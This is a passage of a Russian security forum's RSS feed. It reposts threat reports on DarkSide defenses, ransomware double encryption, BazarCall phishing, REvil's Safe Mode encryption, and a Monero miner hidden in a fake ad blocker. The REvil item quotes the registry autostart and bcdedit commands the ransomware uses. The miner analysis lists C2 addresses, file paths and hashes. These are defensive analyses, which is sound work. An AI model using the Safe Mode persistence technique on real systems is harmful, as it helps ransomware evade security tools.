			<B> Как защитить сеть от DarkSide и других программ-вымогателей<br /></B><br />Следующие ниже методы могут помочь организациям снизить риск инцидента с шифраторами.<br /><br /><B>Тренинг по повышению осведомленности о кибербезопасности</B>: поскольку большая часть программ-вымогателей распространяется посредством действий, инициированных пользователями, организациям следует внедрять обучающие программы, направленные на обучение конечных пользователей основам кибербезопасности. Программы-вымогатели и методы их распространения постоянно развиваются, поэтому обучение должно происходить постоянно, чтобы конечные пользователи могли столкнуться с текущими угрозами.<br /><B>Гигиена учетных данных</B>: соблюдение надлежащей гигиены учетных данных может помочь предотвратить атаки методом перебора, смягчить последствия кражи учетных данных и снизить риск несанкционированного доступа к сети.<br /><B>Многофакторная аутентификация</B>: MFA обеспечивает дополнительный уровень безопасности, который может помочь предотвратить несанкционированный доступ к учетным записям, инструментам, системам и хранилищам данных. Организации должны рассмотреть возможность включения MFA везде, где это возможно.<br /><B>Исправления безопасности:</B> организации любого размера должны иметь надежную стратегию управления исправлениями, которая гарантирует, что обновления безопасности на всех конечных точках, серверах и устройствах применяются как можно скорее, чтобы минимизировать окно возможностей для атаки.<br /><B>Резервное копирование</B>: резервное копирование - один из наиболее эффективных способов смягчения последствий инцидента с программным вымогателем. Многие виды программ-вымогателей могут распространяться по сети и шифровать локально хранимые резервные копии, поэтому организациям следует использовать различные хранилища мультимедиа и хранить резервные копии как на месте, так и за его пределами. См. Это руководство для получения дополнительной информации о создании резервных копий, защищенных от программ-вымогателей.<br /><B>Повышение безопасности системы:</B> усиление защиты сетей, серверов, операционных систем и приложений имеет решающее значение для уменьшения поверхности атаки и управления потенциальными уязвимостями безопасности. Отключение ненужных и потенциально используемых служб, таких как PowerShell, RDP, Windows Script Host, макросы Microsoft Office и т. Д., Снижает риск первоначального заражения, а реализация принципа наименьших привилегий может помочь предотвратить боковое перемещение.<br /><B>Блокировать макросы</B>: многие семейства программ-вымогателей поставляются через встроенные макросы Microsoft Office или PDF-документы. Организации должны пересмотреть использование макросов, рассмотреть возможность блокировки всех макросов из Интернета и разрешить выполнение только проверенных и утвержденных макросов из надежных мест.<br /><B>Аутентификация электронной почты</B>: организации могут использовать различные методы проверки подлинности электронной почты, такие как структура политики отправителя, почта с идентификацией DomainKeys и проверка подлинности сообщений на основе домена, отчетность и соответствие, для обнаружения подделки электронной почты и выявления подозрительных сообщений.<br /><B>Сегрегация сети:</B> эффективное разделение сети помогает сдерживать инциденты, предотвращает распространение вредоносных программ и сокращает нарушение целостности бизнеса.<br /><B>Мониторинг сети:</B> организации любого размера должны иметь системы для отслеживания возможных каналов утечки данных и немедленного реагирования на подозрительную активность.<br /><B>Тестирование на проникновение</B>: тестирование на проникновение может быть полезно для выявления уязвимостей в ИТ-инфраструктуре и уязвимости сотрудников к программам-вымогателям. Результаты теста можно использовать для распределения ИТ-ресурсов и информирования о будущих решениях по кибербезопасности.<br /><B>План реагирования на инциденты</B>: организации должны иметь комплексный план реагирования на инциденты, в котором точно указывается, что делать в случае заражения. Быстрое реагирование может помочь предотвратить распространение вредоносного ПО, свести к минимуму сбои и обеспечить максимально эффективное устранение инцидента.<br /><br /><noindex><a href="https://blog.emsisoft.com/en/38577/ransomware-profile-darkside/" target="_blank" rel="nofollow">https://blog.emsisoft.com/en/38577/ransomware-profile-darkside/</a></noindex> <br />
			<i>18.05.2021 07:53:14, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16422/message112386/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16422/message112386/</guid>
			<pubDate>Tue, 18 May 2021 07:53:14 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Злоумышленники теперь дважды шифруют данные с помощью нескольких штаммов вымогателей.</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16421/message112385/">Злоумышленники теперь дважды шифруют данные с помощью нескольких штаммов вымогателей.</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Сценарий: вы заплатили выкуп, получили инструмент дешифрования от злоумышленника и использовали его для восстановления ваших файлов ... только для того, чтобы обнаружить, что некоторые или все из них все еще зашифрованы. Именно в такой ситуации оказались некоторые компании.<br /><br />Недавно мы наблюдали новую тенденцию, когда злоумышленники используют несколько разновидностей программ-вымогателей для двойного шифрования данных, чтобы еще больше усложнить процесс восстановления и повысить свои шансы на выплату.<br /><br />В этом сообщении блога мы обсуждаем, как работает двойное шифрование, возможные мотивы, лежащие в основе этой тактики, и лучший способ пострадавшим организациям восстановиться после атаки с двойным шифрованием.<br /><br />Метод двойного вымогательства, о котором идет речь в этой статье, возникает, когда один злоумышленник решает развернуть несколько штаммов программ-вымогателей в одной сети. Важно отметить, что это не тот тип атак с несколькими программами-вымогателями, который мы видели в прошлом, когда одна сеть взламывается несколькими злоумышленниками, что приводит к развертыванию нескольких вариантов программ-вымогателей в одной и той же сети в отдельных атаках.<br /><br /> &nbsp; <br />====quote====<br /> Как это работает<br /><br /> &nbsp; &nbsp;Больше не довольствуясь двойным вымогательством, некоторые аффилированные лица теперь предпочитают двойное шифрование данных: другими словами, развертывают более одного типа программ-вымогателей в одной сети. Например, мы видели случаи, когда аффилированные лица шифруют данные с помощью REvil и Netwalker, а также другие случаи, когда MedusaLocker и GlobeImposter использовались в тандеме. В некоторых случаях, чтобы доказать, что файлы с двойным шифрованием могут быть восстановлены при оплате спроса, филиалы предоставляют образцы расшифрованных файлов через веб-портал одной группы, когда зашифрованные файлы были отправлены им через веб-портал другой группы. Очевидно, что в этих случаях аффилированные лица поддерживали рабочие отношения с обеими группами - что не является редкостью.<br /><br /> &nbsp; &nbsp;Мы видели, как стратегия двойного шифрования применяется двумя способами:<br /><br /> &nbsp; &nbsp;Многоуровневое шифрование: данные шифруются с помощью программы-вымогателя A, а затем зашифрованные данные повторно шифруются с помощью программы-вымогателя B.<br /><br /> &nbsp; &nbsp;Параллельное шифрование: некоторые системы зашифрованы с помощью программы-вымогателя A, а другие - с помощью программы-вымогателя B. В некоторых случаях обе системы добавляют зашифрованные файлы с одним и тем же расширением, что может еще больше усложнить восстановление.<br /><br />=============<br />Почему злоумышленники используют двойное шифрование<br /><br />Хотя мы не умеем читать мысли и поэтому не можем сказать наверняка, почему злоумышленники используют двойное шифрование, есть несколько очевидных объяснений:<br />Помешать усилиям по восстановлению<br /><br />Восстановление после регулярной атаки программ-вымогателей - дорогостоящее, трудоемкое и трудоемкое занятие. Злоумышленники могут полагать, что добавление еще одного уровня шифрования к и без того сложному процессу восстановления может быть дополнительным рычагом, необходимым для того, чтобы убедить жертв платить за расшифровку, а не восстанавливать свои системы самостоятельно.<br />Повышенная выплата<br /><br />Двойное шифрование потенциально означает двойную выплату. Злоумышленники, скорее всего, полагаются на жертв, которые не осознают, что их данные были зашифрованы дважды. В этом сценарии жертвы будут платить за удаление первого уровня шифрования только для того, чтобы обнаружить, что их файлы заблокированы вторым уровнем шифрования, который может быть удален только с дополнительным выкупом.<br />Более высокий шанс успешного развертывания<br /><br />Злоумышленники могут использовать несколько разновидностей программ-вымогателей, чтобы повысить свои шансы на успешное развертывание. В случае, если один вариант вымогателя не работает должным образом или блокируется инструментами безопасности цели, другой вымогатель все еще может запуститься.<br />A / B тестирование<br /><br />Также возможно, что злоумышленники используют двойное шифрование как форму A / B-тестирования, чтобы увидеть, какой вариант программы-вымогателя приводит к увеличению выплат выкупа. Результаты таких тестов могут определить, какие варианты атак отдают предпочтение в будущих атаках.<br />Двойное шифрование делает восстановление намного сложнее<br /><br />Двойное шифрование значительно усложняет восстановление<br /><br />Выплата выкупа не выводит компании из леса. Даже при использовании инструментов злоумышленников восстановление всегда затруднено, а двойное шифрование делает его еще более сложным. На самом деле, намного сложнее.<br /><br />В случае однократного шифрования существует высокий риск повреждения данных либо из-за программы-вымогателя, либо из-за дешифратора злоумышленника. В случае двойного шифрования этот риск увеличивается вдвое. Кроме того, расшифровка - это трудоемкий процесс. Инструменты злоумышленников обычно не позволяют указывать папку для папок для дешифрования и вместо этого медленно сканируют всю систему. Следовательно, когда инструменты выходят из строя, что случается часто, или когда обнаруживается второй уровень шифрования, процесс дешифрования должен начинаться заново. Точно так же инструменты часто требуют ручного вмешательства, требуя присутствия каждой рабочей станции во время дешифрования и ввода команд по мере необходимости. Короче говоря, специалисты по реагированию на инциденты вынуждены переключаться между одним плохо запрограммированным инструментом и другим. А случаи двойного шифрования удваивают проблемы.<br /><br />Делаем восстановление проще и быстрее<br /><br />Как отмечалось выше, двойное шифрование делает восстановление еще более сложным и без соответствующих инструментов, вероятно, приведет к тому, что организации будут испытывать значительно большее время простоя.<br /><br />Чтобы помочь жертвам программ-вымогателей с двойным шифрованием быстрее выздороветь, Emsisoft предлагает универсальный дешифратор, специально разработанный для обработки инцидентов, связанных с программами-вымогателями, в которых задействовано несколько вариантов. Универсальный дешифратор может отслаивать несколько уровней шифрования без необходимости использования нескольких дешифраторов, предоставляемых злоумышленником, которые часто реализованы несовершенно и иногда могут безвозвратно повредить данные в процессе дешифрования.<br /><br />Универсальный дешифратор был создан для решения этих и других проблем: он безопаснее, чем инструменты, предоставляемые злоумышленником, поддерживает скрипты, поддерживает полную отчетность, избавляет от необходимости создавать резервные копии зашифрованных файлов и может сократить время восстановления на 70%.<br /><br /><noindex><a href="https://blog.emsisoft.com/en/38554/psa-threat-actors-now-double-encrypting-data-with-multiple-ransomware-strains/" target="_blank" rel="nofollow">https://blog.emsisoft.com/en/38554/psa-threat-actors-now-double-encrypting-data-with-multiple-ransomware-strains/</a></noindex> <br />
			<i>18.05.2021 07:00:18, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16421/message112385/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16421/message112385/</guid>
			<pubDate>Tue, 18 May 2021 07:00:18 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>BazarCall использует вредоносные центры обработки вызовов для заражения жертв</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16379/message112237/">BazarCall использует вредоносные центры обработки вызовов для заражения жертв</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>В течение последних двух месяцев исследователи безопасности вели онлайн-битву против нового вредоносного ПО <B>BazarCall</B>, которое использует центры обработки вызовов для распространения некоторых из наиболее вредоносных вредоносных программ для Windows.</B><br /><br />Новое вредоносное ПО было обнаружено как распространяемое центрами обработки вызовов в конце января и названо BazarCall или BazaCall, поскольку злоумышленники изначально использовали его для установки вредоносного ПО BazarLoader.<br /><br />Как и многие вредоносные кампании, BazarCall начинается с фишингового электронного письма, но затем переходит к новому методу распространения - использованию телефонных колл-центров для распространения вредоносных документов Excel, которые устанавливают вредоносные программы.<br /><br />Вместо того, чтобы связывать вложения с электронным письмом, электронные письма BazarCall предлагают пользователям позвонить по номеру телефона, чтобы отменить подписку, прежде чем они будут автоматически списаны. Эти центры обработки вызовов будут затем направлять пользователей на специально созданный веб-сайт для загрузки «формы отмены», устанавливающей вредоносное ПО BazarCall.<br /><br />От фишинговых писем до колл-центров<br /><br /><B>Все атаки BazarCall начинаются с фишингового электронного письма, нацеленного на корпоративных пользователей, в котором говорится, что бесплатная пробная версия получателя скоро истечет</B>. Однако эти электронные письма не содержат никаких подробностей о предполагаемой подписке.<br /><br />Эти электронные письма затем предлагают пользователю связаться с указанным номером телефона, если он хочет отменить подписку, прежде чем с него будет взиматься плата от 69,99 до 89,99 долларов за продление, как показано в примере фишингового письма BazarCall ниже.<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazarcaller/bazarcall-spam-example.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Большая часть электронных писем были отправлены с указанием вымышленной компании, такие как "Medical reminder service, Inc.", 'iMed Service, Inc.', 'Blue Cart Service, Inc. . 'и' iMers, Inc. '<br /><br />Во всех этих письмах используются похожие темы, такие как «Спасибо за использование бесплатной пробной версии» или «Ваш бесплатный пробный период почти закончился!» Исследователь безопасности ExecuteMalware составил более обширный список тем электронной почты, используемых в этой атаке.<br /><br />Когда получатель звонит по указанному номеру телефона, он будет переведен на короткое удержание, а затем его встретит живой человек. При запросе дополнительной информации или о том, как отменить подписку, агент центра обработки вызовов запрашивает у жертвы уникальный идентификатор клиента, указанный в электронном письме.<br /><br />Если указан правильный идентификатор клиента, агент колл-центра направит пользователя на поддельный веб-сайт, который выдает себя за компанию, предоставляющую медицинские услуги. Телефонный агент останется на телефоне с жертвой и направит их на страницу отмены, где им будет предложено ввести свой идентификатор клиента.<br /><br />Когда пользователь вводит свой идентификационный номер клиента, веб-сайт автоматически предлагает браузеру загрузить документ Excel (xls или xlsb). Затем агент центра обработки вызовов поможет жертве открыть файл и нажать кнопку «Включить контент», чтобы активировать вредоносные макросы.<br /><br />В некоторых звонках, злоумышленники просили его отключить антивирус, чтобы предотвратить обнаружение вредоносных документов.<br /><br /><img src="https://www.bleepstatic.com/images/news/malware/b/bazarcaller/malicious-excel-document.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />Когда макросы Excel включены, вредоносная программа BazarCall загружается и запускается на компьютере жертвы.<br /><br />Когда кампания BazarCall только началась, она использовалась для распространения вредоносного ПО BazarLoader, но также начала распространять TrickBot, IcedID, Gozi IFSB и другие вредоносные программы.<br /><br />Эти заражения Windows особенно опасны, поскольку они обеспечивают удаленный доступ к скомпрометированным корпоративным сетям, где злоумышленники распространяются по сети, чтобы украсть данные или развернуть программы-вымогатели.<br /><br />Злоумышленники используют BazarLoader и Trickbot для развертывания программ-вымогателей Ryuk или Conti, в то время как IcedID использовался в прошлом для развертывания заражений программ-вымогателей Maze и Egregor.<br /><br />Благодаря усилиям исследователей служба распространения была вынуждена постоянно менять их номера телефонов и хостинговые сайты, поскольку исследователи их отключили.<br /><br />К сожалению, даже благодаря совместным усилиям сообщества специалистов по кибербезопасности этот метод распространения оказался очень успешным.<br /><br />Из-за метода распространения образцы вредоносных программ обычно имеют очень низкий уровень обнаружения на VirusTotal, поскольку они не распространяются публично и не обнаруживаются поставщиками антивирусов.<br /><br /><B>Кроме того, судя по электронным письмам, люди попадают на эту аферу, поскольку считают, что это законные подписки, которые необходимо отменить. </B><br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/bazarcall-malware-uses-malicious-call-centers-to-infect-victims/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/bazarcall-malware-uses-malicious-call-centers-to-infect-victims/</a></noindex> <br />
			<i>01.04.2021 11:26:25, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16379/message112237/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16379/message112237/</guid>
			<pubDate>Thu, 01 Apr 2021 11:26:25 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>REvil Ransomware использует новый режим шифрования из Windows Safe Mode</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16370/message112208/">REvil Ransomware использует новый режим шифрования из Windows Safe Mode</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>REvil добавил новую возможность шифрования файлов в безопасном режиме Windows, что позволяет избежать обнаружения программным обеспечением безопасности и добиться большего успеха при шифровании файлов.<br /></B><br />Безопасный режим Windows - это специальный режим запуска, который позволяет пользователям запускать административные и диагностические задачи в операционной системе. В этом режиме загружается только самый минимум программного обеспечения и драйверов, необходимых для работы операционной системы.<br /><br />Более того, любые установленные в Windows программы, которые настроены на автоматический запуск, не будут запускаться в безопасном режиме, если их автозапуск не настроен определенным образом.<br /><br />Один из способов создать автозапуск в Windows - создать записи в следующих разделах реестра:<br /><br /> &nbsp; &nbsp;<br />====quote====<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion<WBR/>&shy;\Run<br /> &nbsp; &nbsp;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\<WBR/>&shy;Run<br /> &nbsp; &nbsp;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion<WBR/>&shy;\RunOnce<br /> &nbsp; &nbsp;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\<WBR/>&shy;RunOnce<br />=============<br /><br />Ключи «Run» запускают программу каждый раз, когда вы входите в систему, а ключи «RunOnce» запускает программу только один раз, а затем удаляет запись из реестра.<br /><br />Например, следующий ключ реестра автоматически запустит программу C:\Users\test\test.exe при входе в Windows.<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br /> &nbsp; &nbsp;"Startup"="C:\Users\test\test.exe"<br />=============<br /><br /><br />Однако указанный выше автозапуск не запустится в безопасном режиме, если вы не добавите звездочку (*) в начало имени значения, как показано ниже:<br /><br /> <br />====quote====<br /> &nbsp; [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br /> &nbsp; &nbsp;"* Startup" = "C:\Users\test\test.exe"<br />=============<br /><br />REvil теперь включает режим 'Safe Mode'<br /><br />В новом образце вымогателя REvil, обнаруженном MalwareHunterTeam, был добавлен новый аргумент командной строки -smode, который заставляет компьютер перезагружаться в безопасном режиме перед шифрованием устройства.<br /><br />Для этого REvil выполнит следующие команды, чтобы компьютер загрузился в безопасном режиме с загрузкой сетевых драйверов при следующей перезагрузке Windows.<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;bootcfg /raw /a /safeboot:network /id 1<br /> &nbsp; &nbsp;bcdedit /set {current} safeboot network<br />=============<br /><br /><br />Затем он создает автозапуск «RunOnce» под названием «* franceisshit», который выполняет «bcdedit / deletevalue {current} safeboot» после того, как пользователь войдет в безопасный режим.<br /><br />Наконец, программа-вымогатель выполняет принудительный перезапуск Windows, который не может быть прерван пользователем.<br /><br />Непосредственно перед завершением процесса он создаст дополнительный автозапуск RunOnce под названием «AstraZeneca», возможно, в связи с недавними обсуждениями во Франции использования вакцины.<br /><br />Этот автозапуск перезапустит программу-вымогатель REvil без аргумента -smode, когда следующий пользователь войдет в систему после перезагрузки устройства.<br /><br />Важно помнить, что обе эти записи RunOnce будут выполнены после входа в безопасный режим и будут автоматически удалены Windows.<br /><br />После перезагрузки устройство запустится в безопасном режиме с загрузкой сетевых драйверов, и пользователю будет предложено войти в Windows. После входа в систему программа-вымогатель REvil будет запущена без аргумента -smode, чтобы начать шифрование файлов на устройстве.<br /><br />Windows также запустит команду «bcdedit / deletevalue {current} safeboot», настроенную ключом реестра «* AstraZeneca», чтобы компьютер мог перезагрузиться в нормальный режим после завершения работы программы-вымогателя.<br /><br />Пока REvil шифрует файлы, экран безопасного режима будет пустым, но по-прежнему можно использовать Ctrl + Alt + Delete для запуска диспетчера задач Windows. Оттуда вы можете увидеть запущенный исполняемый файл, который в нашем тесте называется «smode.exe», как показано ниже.<br /><br />Во время работы программа-вымогатель не позволяет пользователям запускать какие-либо программы через диспетчер задач, пока не завершит шифрование устройства.<br /><br />После того, как устройство будет зашифровано, будет продолжена остальная часть последовательности загрузки, а рабочий стол будет показан с запиской о выкупе и зашифрованными файлами.<br /><br />Необычный подход<br /><br />Новая операция REvil в безопасном режиме немного странная, поскольку требует от пользователей входа в систему после перезапуска в безопасном режиме.<br /><br />Кроме того, как только они войдут в безопасный режим, они будут представлены с пустым экраном и загрузкой дисков, поскольку программа-вымогатель шифрует устройство.<br /><br />Такое поведение может привести к тому, что пользователи могут перейти в спящий режим или выключат свои компьютеры в целях безопасности.<br /><br />По этой причине возможно, что злоумышленники вручную запускают новую команду безопасного режима на определенных компьютерах, таких как виртуальные машины или серверы, которые они хотят зашифровать без проблем.<br /><br /><B>Независимо от причин, это еще один новый метод атаки, на который следует обратить внимание специалистам по безопасности и администраторам Windows, поскольку группы вымогателей постоянно меняют свою тактику.<br /></B><br />REvil - не единственная операция, использующая безопасный режим для шифрования устройств.<br /><br />В 2019 году еще одна программа-вымогатель, известная как Snatch, также добавила возможность шифровать устройство в безопасном режиме с помощью службы Windows.<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/</a></noindex> <br />
			<i>24.03.2021 15:10:59, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16370/message112208/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16370/message112208/</guid>
			<pubDate>Wed, 24 Mar 2021 15:10:59 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Майнер Monero распространяется через установку пакетов AdShield/Netshield, OpenDNS</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16360/message112104/">Майнер Monero распространяется через установку пакетов AdShield/Netshield, OpenDNS</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Активность майнера наблюдалась на форумах безопасности (Kasperskyclub.ru, Virusinfo.info, Cyberforum.ru) в период с февраля 2021, хотя отзывы о проблеме судя по поискам в сети пошли ранее (ноябрь-декабрь 2020г)<br />По отчету <noindex><a href="https://securelist.ru/ad-blocker-with-miner-included/100732/" target="_blank" rel="nofollow">Лаборатории Касперского на securelist.ru</a></noindex>, активное детектирование зловредов началось с февраля 2021 года.<br /><br />1.<br /><br /><br />====quote====<br /> &nbsp; &nbsp;Зловред распространяется под именем adshield[.]pro и выдает себя за Windows-версию мобильного блокировщика рекламы AdShield. После того как пользователь запускает программу, она меняет настройки DNS на устройстве так, что все домены начинают разрешаться через серверы злоумышленников, которые, в свою очередь, не дают пользователям получить доступ к сайтам некоторых антивирусов, например к Malwarebytes.com.<br />=============<br /><br />185.201.47.42,142.4.214.15\DNS Server list<br /><br />2.<br /><br /><br />====quote====<br /> &nbsp; &nbsp;После подмены DNS-серверов зловред начинает обновляться и запускает updater.exe с аргументом self-upgrade («C:\Program Files (x86)\AdShield\updater.exe» -self-upgrade). Updater.exe обращается к командному центру и отправляет сведения о зараженной машине и информацию о начале установки.<br />=============<br /><br />C:\PROGRAM FILES (X86)\ADSHIELD\UPDATER.EXE<br />HEUR:Trojan.Win32.DNSChanger.gen<br />C:\WINDOWS\SYSTEM32\TASKS\ADSHIELD SCHEDULED AUTOUPDATE<br />"C:\Program Files (x86)\AdShield\updater.exe" -self-upgrade<br /><br />3.<br /><br /><br />====quote====<br /> &nbsp; &nbsp;Updater.exe скачивает с сайта transmissionbt[.]org и запускает модифицированный торрент-клиент Transmission (оригинальный дистрибутив находится по адресу transmissionbt.com). Модифицированная программа отсылает на командный сервер информацию об установке вместе с идентификатором зараженной машины и загружает с него модуль для майнинга.<br />=============<br /><br />Модули для майнинга состоят из легитимных вспомогательных библиотек, зашифрованного файла с майнером data.pak, исполняемого файла flock.exe\slack.exe\discord.exe и файла «лицензии» lic.data.<br /><br /><br />====quote====<br /> &nbsp; &nbsp;....<br /> &nbsp; &nbsp;\Flock\config.json<br /> &nbsp; &nbsp;\Flock\data.pak<br /> &nbsp; &nbsp;\Flock\Flock.exe<br /> &nbsp; &nbsp;\Flock\lic.data<br /> &nbsp; &nbsp;\Flock\Qt5Core.dll<br /> &nbsp; &nbsp;\Flock\WinRing0x64.sys<br /> &nbsp; &nbsp;...<br />=============<br /><br />4. flock.exe запускается с помощью клиента transmission (запускаемый как служба)<br />C:\PROGRAM FILES (X86)\TRANSMISSION\TRANSMISSION-DAEMON.EXE<br />Действительна, подписано SignPath Foundation<br />"C:\Program Files (x86)\Transmission\transmission-daemon.exe" -run-instance<br /><br />5. после запуска Flock.exe расшифровывает данные из файла data.pak, содержащие файл майнера.<br />далее, в копию системного файла find.exe внедряется расшифрованное тело майнера.<br /><br />(!) Процесс нагружает CPU: C:\WINDOWS\SYSTEM32\FIND.EXE<br />(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3648], tid=3940<br /><br /><br />====quote====<br />Полное имя C:\WINDOWS\SYSTEM32\FIND.EXE<br /><br />Удовлетворяет критериям<br />THREADS IN PROCESSES (ПРЕДУПРЕЖДЕНИЕ ~ ОБНАРУЖЕН ВНЕДРЕННЫЙ ПОТОК В ПРОЦЕССЕ)(1) [auto (0)]<br />FLOCK (FILTERED) (ПОЛНОЕ ИМЯ ~ \WINDOWS\SYSTEM32\FIND.EXE)(1) [filtered (0)]<br />FLOCK (FILTERED).NET ( ESTABLISHED ~ &gt; 54.93.84.207:443)(1) [filtered (0)]<br /><br />pid = 3076 ***\***<br />CmdLine "C:\ProgramData\Flock\find.exe"<br />Процесс создан 00:39:49 [2021.02.18]<br />С момента создания 00:05:25<br />CPU 49,85%<br />CPU (1 core) 797,57%<br />parentid = 13628<br />ESTABLISHED 192.168.0.98:55478 &lt;-&gt; 54.93.84.207:443<br />Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=14380<br />Предупреждение (!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSTEM32\FIND.EXE [3076], tid=9436<br />SHA1 1E44EE63BDB2CF3A6E48B521844204218A001344<br />MD5 AE3F3DC3ED900F2A582BAD86A764508C<br /><br />Загруженные DLL НЕИЗВЕСТНЫЕ<br />BXSDK64.DLL C:\USERS\SHUM\APPDATA\LOCAL\TEMP<br /><br />Загруженные DLL ИЗВЕСТНЫЕ и ПРОВЕРЕННЫЕ<br />ADVAPI32.DLL C:\WINDOWS\SYSTEM32<br />=============<br /><br />[FILE ID=119088]<br /><br />далее, разработчиком uVS предложена новая функция (реализована в 4.11.5 и расширена в 4.11.6), которая позволила отследить, каким образом запускается Flock.exe\Slack.exe\Discord.exe<br />+<br />спасибо<B>, Sandor-у </B>за оперативно <noindex><a href="https://www.cyberforum.ru/post15308023.html" target="_blank" rel="nofollow">добавленный диалог</a></noindex>:<br />+<br /><B>Vvvyg</B> - за скрипт экспорта журналов для анализа,<br />+<br /><B>Virus Monitoring Service Doctor Web Ltd</B>. за поиск тела майнера в папке модулей flock<br /><br />благодаря предложенной функции стало возможным отследить цепочку запуска вредоносных программ.<br /><br /><br />====quote====<br />EV_RenderedValue_0,00<br />Elvi51<br />ELVI51<br />277248<br />7264<br />C:\Windows\System32\find.exe<br />%%1937<br />16620<br />"C:\WINDOWS\system32\find.exe"<br />EV_RenderedValue_9,00<br />-<br />-<br />0<br />C:\ProgramData\Discord\Discord.exe<br />EV_RenderedValue_14,00<br /><br />=============<br /><br />К событию были добавлены следующие сведения:<br /><br /><br />====quote====<br />EV_RenderedValue_0,00<br />ELVI51$<br />WORKGROUP<br />999<br />16620<br />C:\ProgramData\Discord\Discord.exe<br />%%1937<br />1400<br />C:\ProgramData\Discord\Discord.exe --min<br />EV_RenderedValue_9,00<br />Elvi51<br />ELVI51<br />277248<br />C:\Windows\System32\svchost.exe<br />EV_RenderedValue_14,00<br />=============<br /><br />по образу из uVS видим что Discord.exe запускается через задачу:<br /><br /><br />====quote====<br />Полное имя C:\PROGRAMDATA\DISCORD\DISCORD.EXE<br />Сигнатура Trojan.Win64.Miner.gen [Kaspersky] (delall) [глубина совпадения 33(58), необх. минимум 30, максимум 64] 2021-02-28<br /><br />SHA1 397F3E0FD803DA50EC667C1161E57CDC242400C3<br />MD5 07D8343249A56EEBF2B1A8B944C217A3<br /><br />Ссылки на объект<br />Ссылка C:\WINDOWS\TASKS\DISCORDCHECK_4.JOB<br />Значение "C:\ProgramData\Discord\Discord.exe" --min<br />=============<br /><br /><br />====quote====<br />4.11.5 o Добавлена поддержка отслеживания процессов.<br />Отслеживание процессов позволяет определять родителя любого процесса, даже если родительский процесс уже завершен, а также достоверно определять все файлы, которые запускались с момента старта системы.<br />=============<br /><br />Полное имя C:\PROGRAMDATA\SLACK\SLACK.EXE<br />Тек. статус ВИРУС [Запускался неявно или вручную]<br /><br />Создан 08.03.2021 в 09:52:29<br />Изменен 08.03.2021 в 11:17:11<br /><br />Доп. информация на момент обновления списка<br />pid = 13816 *****\****<br />Процесс создан 11:17:35 [2021.03.08]<br />Процесс завершен 11:18:28 [2021.03.08]<br />parentid = 1684 C:\WINDOWS\SYSTEM32\SVCHOST.EXE<br />SHA1 9C44709D620DF76174B6E268DADA1256FA3BA007<br />MD5 C7988D4AE969D11D9ABBAFC8CE0C5CA2<br /><br />pid = 1684 NT AUTHORITY\СИСТЕМА<br />CmdLine C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule<br />Процесс создан 11:16:52 [2021.03.08]<br /><br />+<br /> <br />====quote====<br />4.11.6 o Добавлена поддержка отслеживания задач.<br />В окно информации исполняемого файла, который создавал, модифицировал или изменял задачи добавлены следующие разделы:<br />"Создание задачи", "Удаление задачи", "Обновление задачи" в которых указано время операции, pid процесса,<br />pid и имя запустившего процесс, а так же XML описание задачи при его наличии.<br />Твики #39/#40 теперь включают/отключают отслеживание процессов и задач.<br />(!) Только для Windows 10 билд 1903 и выше.<br />=============<br /> <br />
			<img src="https://forum.esetnod32.ru/bitrix/components/bitrix/forum.interface/show_file.php?fid=119088&" width="860" height="520" /><br /><i>14.03.2021 17:07:11, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16360/message112104/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16360/message112104/</guid>
			<pubDate>Sun, 14 Mar 2021 17:07:11 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>RDP, Ransomware - проблемы, которые никуда не денутся</title>
